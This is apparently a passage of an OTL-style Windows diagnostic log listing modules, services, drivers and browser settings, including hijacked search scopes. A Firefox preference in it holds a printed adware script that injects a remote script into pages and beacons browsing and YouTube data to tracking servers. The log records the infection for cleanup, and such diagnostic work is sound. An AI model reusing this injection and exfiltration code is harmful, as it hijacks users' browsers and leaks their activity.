MOD - [2014/10/16 02:19:21 | 000,122,880 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\046058f81b039ab6fd839e03e67595f8\SMDiagnostics.ni.dll
MOD - [2014/10/16 02:19:20 | 000,794,112 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\35d3a1b878542de59cb4fc0593992404\System.ServiceModel.Internals.ni.dll
MOD - [2014/10/16 02:19:19 | 000,976,384 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\0648dbecb7e3fb9523565107e04a5caf\System.Configuration.ni.dll
MOD - [2014/10/16 02:19:17 | 010,100,736 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\System\17a393b77ae757f0768501fb95ff5af6\System.ni.dll
MOD - [2014/10/11 13:06:16 | 000,073,544 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
MOD - [2014/10/11 13:05:58 | 001,044,776 | ---- | M] () -- C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
MOD - [2014/09/28 21:01:38 | 036,730,032 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libcef.dll
MOD - [2014/09/28 21:01:38 | 000,746,160 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libGLESv2.dll
MOD - [2014/09/28 21:01:38 | 000,136,368 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CEF\libEGL.dll
MOD - [2014/09/26 14:40:46 | 006,237,856 | ---- | M] () -- C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
MOD - [2014/08/26 17:47:08 | 001,491,968 | ---- | M] () -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\DAQExp.dll
MOD - [2014/05/19 17:19:02 | 000,137,728 | ---- | M] () -- C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\CBSCreateVC.dll
MOD - [2014/05/03 08:33:17 | 016,351,920 | ---- | M] () -- C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_206.dll
MOD - [2014/02/27 03:03:52 | 016,953,856 | ---- | M] () -- C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\ce5f61c5754789df97be8dc991c47d07\mscorlib.ni.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 18:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- c:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- c:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/05/26 21:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2012/06/07 17:30:20 | 001,431,888 | ---- | M] (Flexera Software, Inc.) [On_Demand | Stopped] -- C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService64.exe -- (FLEXnet Licensing Service 64)
SRV:64bit: - [2011/01/08 07:17:46 | 000,087,336 | ---- | M] (Dassault Systèmes SolidWorks Corp.) [Disabled | Stopped] -- C:\Program Files\SolidWorks Corp\SolidWorks\swScheduler\DTSCoordinatorService.exe -- (CoordinatorServiceHost)
SRV:64bit: - [2010/09/22 17:10:10 | 000,057,184 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Program Files\Windows Live\Mesh\wlcrasvc.exe -- (wlcrasvc)
SRV - [2014/12/19 08:48:18 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/12/11 11:36:04 | 000,089,864 | ---- | M] (Hewlett-Packard Company) [Auto | Running] -- C:\Program Files (x86)\hp\Common\HPSupportSolutionsFrameworkService.exe -- (HPSupportSolutionsFrameworkService)
SRV - [2014/12/09 09:15:01 | 000,114,800 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2014/07/22 14:25:38 | 001,042,808 | R--- | M] (Western Digital Technologies, Inc.) [Auto | Running] -- C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe -- (WDBackup)
SRV - [2014/05/23 11:09:00 | 000,296,312 | R--- | M] (Western Digital Technologies, Inc.) [Auto | Running] -- C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe -- (WDDriveService)
SRV - [2014/05/03 08:33:19 | 000,257,712 | ---- | M] (Adobe Systems Incorporated) [Disabled | Stopped] -- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe -- (AdobeFlashPlayerUpdateSvc)
SRV - [2014/03/20 14:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/09/25 05:37:14 | 000,181,152 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Adobe\Elements 12 Organizer\PhotoshopElementsFileAgent.exe -- (AdobeActiveFileMonitor12.0)
SRV - [2013/09/11 21:21:54 | 000,105,144 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2012/07/05 17:41:46 | 003,048,136 | ---- | M] (Skype Technologies S.A.) [Disabled | Stopped] -- C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe -- (Skype C2C Service)
SRV - [2012/06/07 13:15:17 | 001,044,816 | ---- | M] (Flexera Software, Inc.) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe -- (FLEXnet Licensing Service)
SRV - [2012/06/07 13:07:25 | 000,079,360 | ---- | M] (SolidWorks) [Disabled | Stopped] -- C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe -- (SolidWorks Licensing Service)
SRV - [2010/12/08 17:23:10 | 000,136,568 | ---- | M] (iAnywhere Solutions, Inc.) [Disabled | Stopped] -- C:\Program Files (x86)\SQL Anywhere 10\win32\dbsrv10.exe -- (SQLANYs_SmpParts)
SRV - [2010/10/22 12:08:18 | 001,039,360 | ---- | M] (Hewlett-Packard Co.) [Auto | Running] -- C:\Program Files (x86)\hp\Digital Imaging\bin\HPSLPSVC64.DLL -- (HPSLPSVC)
SRV - [2010/07/01 09:38:26 | 000,083,512 | ---- | M] (ArcSoft, Inc.) [Disabled | Stopped] -- C:\Users\BRIAN\AppData\Roaming\HP SimpleSave Application\uUACTokenSvc.exe -- (BackupService)
 
 
========== Driver Services (SafeList) ==========
 
DRV:64bit: - [2014/08/15 23:35:00 | 000,054,784 | ---- | M] (Apple, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\usbaapl64.sys -- (USBAAPL64)
DRV:64bit: - [2014/07/18 15:19:56 | 000,107,368 | ---- | M] (LogMeIn, Inc.) [File_System | Disabled | Stopped] -- C:\Windows\SysNative\LMIRfsClientNP.dll -- (LMIRfsClientNP)
DRV:64bit: - [2014/07/17 17:05:06 | 000,125,584 | ---- | M] (Microsoft Corporation) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\NisDrvWFP.sys -- (NisDrv)
DRV:64bit: - [2013/07/19 02:01:00 | 000,056,336 | ---- | M] (Corel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\PxHlpa64.sys -- (PxHlpa64)
DRV:64bit: - [2013/05/13 14:36:06 | 000,050,864 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\point64.sys -- (Point64)
DRV:64bit: - [2013/05/13 14:36:06 | 000,029,312 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\nuidfltr.sys -- (NuidFltr)
DRV:64bit: - [2013/03/25 13:41:46 | 000,076,464 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\dc3d.sys -- (dc3d)
DRV:64bit: - [2012/12/10 14:48:02 | 000,044,544 | ---- | M] (Research in Motion Ltd) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\RimSerial_AMD64.sys -- (RimVSerPort)
DRV:64bit: - [2012/10/03 16:14:56 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:64bit: - [2012/08/23 06:10:20 | 000,019,456 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)
DRV:64bit: - [2012/08/23 06:07:35 | 000,057,856 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\TsUsbFlt.sys -- (TsUsbFlt)
DRV:64bit: - [2012/06/20 08:42:44 | 003,678,720 | ---- | M] (Qualcomm Atheros Communications, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\athrx.sys -- (athr)
DRV:64bit: - [2012/03/08 17:40:52 | 000,048,488 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fssfltr.sys -- (fssfltr)
DRV:64bit: - [2012/02/29 22:46:16 | 000,023,408 | ---- | M] (Microsoft Corporation) [Recognizer | Boot | Unknown] -- C:\Windows\SysNative\drivers\fs_rec.sys -- (Fs_Rec)
DRV:64bit: - [2011/09/16 13:10:50 | 000,072,216 | ---- | M] (LogMeIn, Inc.) [File_System | Auto | Running] -- C:\Windows\SysNative\drivers\LMIRfsDriver.sys -- (LMIRfsDriver)
DRV:64bit: - [2011/09/16 13:10:24 | 000,011,552 | ---- | M] (LogMeIn, Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\lmimirr.sys -- (lmimirr)
DRV:64bit: - [2011/05/27 06:05:08 | 000,063,528 | ---- | M] (SafeNet, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\SNTUSB64.SYS -- (SNTUSB64)
DRV:64bit: - [2010/11/20 05:33:35 | 000,078,720 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HpSAMD.sys -- (HpSAMD)
DRV:64bit: - [2010/10/16 04:28:42 | 010,619,296 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\igdkmd64.sys -- (igfx)
DRV:64bit: - [2009/09/17 06:05:02 | 000,145,448 | ---- | M] (SafeNet, Inc.) [Kernel | Auto | Running] -- C:\Windows\SysNative\drivers\sentinel64.sys -- (Sentinel64)
DRV:64bit: - [2009/09/17 04:54:54 | 000,056,344 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (HECIx64)
DRV:64bit: - [2009/08/20 16:05:06 | 000,239,616 | ---- | M] (Realtek                                            ) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\Rt64win7.sys -- (RTL8167)
DRV:64bit: - [2009/08/03 09:56:39 | 000,408,600 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStor.sys -- (iaStor)
DRV:64bit: - [2009/08/03 09:56:37 | 000,237,936 | ---- | M] (Advanced Micro Devices, Inc) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\ahcix64s.sys -- (ahcix64s)
DRV:64bit: - [2009/08/03 09:55:37 | 000,067,128 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdsata.sys -- (amdsata)
DRV:64bit: - [2009/08/03 09:55:37 | 000,028,216 | ---- | M] (Advanced Micro Devices) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\amdxata.sys -- (amdxata)
DRV:64bit: - [2009/07/13 17:52:20 | 000,194,128 | ---- | M] (AMD Technologies Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\amdsbs.sys -- (amdsbs)
DRV:64bit: - [2009/07/13 17:48:04 | 000,065,600 | ---- | M] (LSI Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\lsi_sas2.sys -- (LSI_SAS2)
DRV:64bit: - [2009/07/13 17:45:55 | 000,024,656 | ---- | M] (Promise Technology) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\stexstor.sys -- (stexstor)
DRV:64bit: - [2009/07/13 16:35:32 | 000,012,288 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\serscan.sys -- (StillCam)
DRV:64bit: - [2009/07/13 16:10:47 | 000,011,264 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\rootmdm.sys -- (ROOTMODEM)
DRV:64bit: - [2009/06/10 12:34:33 | 003,286,016 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\evbda.sys -- (ebdrv)
DRV:64bit: - [2009/06/10 12:34:28 | 000,468,480 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bxvbda.sys -- (b06bdrv)
DRV:64bit: - [2009/06/10 12:34:23 | 000,270,848 | ---- | M] (Broadcom Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\b57nd60a.sys -- (b57nd60a)
DRV:64bit: - [2009/06/10 12:31:59 | 000,031,232 | ---- | M] (Hauppauge Computer Works, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\hcw85cir.sys -- (hcw85cir)
DRV:64bit: - [2008/05/06 15:06:00 | 000,014,464 | ---- | M] (Western Digital Technologies) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\wdcsam64.sys -- (WDC_SAM)
DRV - [2009/07/13 17:19:10 | 000,019,008 | ---- | M] (Microsoft Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysWOW64\drivers\wimmount.sys -- (WIMMount)
 
 
========== Standard Registry (SafeList) ==========
 
 
========== Internet Explorer ==========
 
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page =
IE:64bit: - HKLM\..\SearchScopes,DefaultScope =
IE:64bit: - HKLM\..\SearchScopes\{07C7C110-7846-4522-8DA7-7316F05F3171}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE:64bit: - HKLM\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co...=1701220253&ir=
IE:64bit: - HKLM\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...=MSSEDF&pc=MSSE
IE:64bit: - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=MSSE
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
 
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://ca.msn.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-CA
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = E7 B6 09 7D 43 A3 CE 01  [binary data]
IE - HKCU\..\SearchScopes,DefaultScope = {07C7C110-7846-4522-8DA7-7316F05F3171}
IE - HKCU\..\SearchScopes\{07C7C110-7846-4522-8DA7-7316F05F3171}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKCU\..\SearchScopes\{1CA5F7BC-89BD-2C9A-E064-1D25A782985E}: "URL" = http://astromenda.co...=1701220253&ir=
IE - HKCU\..\SearchScopes\{2E00D31D-D171-423D-836D-1A4D7EA7F1A9}: "URL" = http://www.bing.com/...Box&FORM=IESR02
IE - HKCU\..\SearchScopes\{9BB47C17-9C68-4BB3-B188-DD9AF0FD2476}: "URL" = http://www.default-s...p={searchTerms}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>;*.local
 
========== FireFox ==========
 
FF - prefs.js..browser.search.defaultthis.engineName: ""
FF - prefs.js..browser.search.defaulturl: ""
FF - prefs.js..browser.search.isUS: true
FF - prefs.js..browser.search.order.1: "default-search.net"
FF - prefs.js..browser.search.order.3: "Bing "
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "https://www.google.com/?gws_rd=ssl"
FF - prefs.js..extensions.VRP76tdH9kf0F4HH.scode: "try{(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam7\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=b3qau4\")>-1||url.indexOf(\"hash=ijeqe4\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/[/]websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"vatican.com\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"iklk.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"sporty-glow.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"__ipm=\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1||url.indexOf(\"search.searchonme.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1||url.indexOf(\"search.appsarefun.info\")>-1||url.indexOf(\"websearch.mocaflix.com\")>-1||url.indexOf(\"search.easylifeapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"us.yhs4.search.yahoo.com\")>-1||url.indexOf(\"search.gboxapp.com\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"bestonlinegadgetguide.com\")>-1||url.indexOf(\"odpu.com\")>-1||url.indexOf(\"safesearch.co\")>-1||url.indexOf(\"findamo.com\")>-1||url.indexOf(\"search.myownsearchbox.com\")>-1||url.indexOf(\"datropy.com\")>-1||url.indexOf(\"namyneck.com\")>-1||url.indexOf(\"styloosh.com\")>-1||url.indexOf(\"applicationgrabb.net\")>-1||url.indexOf(\"databass.info\")>-1||url.indexOf(\"firstfirst.net\")>-1||url.indexOf(\"liversely.com\")>-1||url.indexOf(\"liversely.net\")>-1||url.indexOf(\"livesetwebs.org\")>-1||url.indexOf(\"lp.ncdownloader.com\")>-1||url.indexOf(\"lp.vaudix.com\")>-1||url.indexOf(\"masteroids.com\")>-1||url.indexOf(\"reditions.net\")>-1||url.indexOf(\"sharesuper.info\")>-1||url.indexOf(\"storaget.info\")>-1||url.indexOf(\"westzip.in\")>-1||url.indexOf(\"boxhilade.com\")>-1||url.indexOf(\"mylinksworld.com\")>-1||url.indexOf(\"shoppingwiz.co\")>-1||url.indexOf(\"rabbitsearch.net\")>-1||url.indexOf(\"searchandbake.com\")>-1){return}}catch(e){};(function(){ if (!document.getElementById(\"djdnjh4e7dne543gv\") && window.top==window.self) { var _irhjpivr = function() { window._chch3e7xjxs2 = \"4273800016501002566\" }; if (-1 == navigator.userAgent.toLowerCase().indexOf(\"chrome\")) _irhjpivr(); else { var s1 = document.createElement(\"script\"); s1.innerHTML = \"(\" + _irhjpivr.toString() + \")()\"; document.getElementsByTagName(\"head\")[0].appendChild(s1) } var s = document.createElement(\"script\"); s.type = \"text/javascript\"; s.id = \"djdnjh4e7dne543gv\"; s.src = \"//static.donation-tools.org/widgets/WPPartner/widget.js?_irh_prodname=TinyWallet&_irh_subid=1089_11214\"; document.getElementsByTagName(\"head\")[0].appendChild(s) } }());;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"ectrWI94=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"ectrWI94=\")){var d=a.match(/ectrWI94=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.websco...dw7qjaFrdaGqjg7\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();(function(){var l=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0,b));return a},m=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||0:0},n=function(){var a=document.getElementsByClassName(\"watch-extras-section\");if(a)for(var b=0;b<a[0].children.length;b++)if(\"Category\"===a[0].children.getElementsByClassName(\"title\")[0].innerHTML.trim()){var c=a[0].children.getElementsByTagName(\"a\");if(c&&c[0]&&(c=c[0].getAttribute(\"href\")))return encodeURIComponent(c.replace(\"/\",\"\"))}return\"\"},p=function(){var a=document.getElementsByClassName(\"yt-subscription-button-subscriber-count-branded-horizontal\");return a&&a[0]&&a[0].innerHTML?(a=a[0].innerHTML.replace(/^([0-9,]+).*$/,\"$1\").replace(/,/g,\"\"))&&parseInt(a)&&parseInt(a)||1:1};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{if(\"qq=\"==window.name.substr(0,3)){var f=document.getElementsByTagName(\"body\")[0];if(!f.getAttribute(\"wyttb\")){f.setAttribute(\"wyttb\",\"1\");var g=l(),d=m(),q=n(),h=p();if(g&&d&&d){var e=window.name.split(\"=\")[1];window.name=\"\";2<=d/h&&((new Image).src=\"https://score.transferin.in/subs.php?id=\"+g+\"&n=\"+d+\"&c=\"+q+\"&s=\"+h+\"&q=\"+e+\"&cb=70.70.42.13\")}}}if(-1<window.self.location.href.indexOf(\"results?search_query=\")){var k=/[\\?&]search_query=([^&#]*)/.exec(location.search),e=null===k?\"\":decodeURIComponent(k[1].replace(/\\+/g,\" \"));window.name=\"qq=\"+e}}catch®{}})();new function(){var k=this;this.utils=new function(){var c=this;c.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var d=a[e];b=new Image;b.src=d}else b=new Image,b.src=a};c.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};c.cookie=new function(){var a=this;a.createCookie=function(a,e,d){if(d){var c=new Date;c.setTime(c.getTime()+864E5*d);d=\"; expires=\"+c.toGMTString()}else d=\"\";document.cookie=a+\"=\"+e+d+\"; 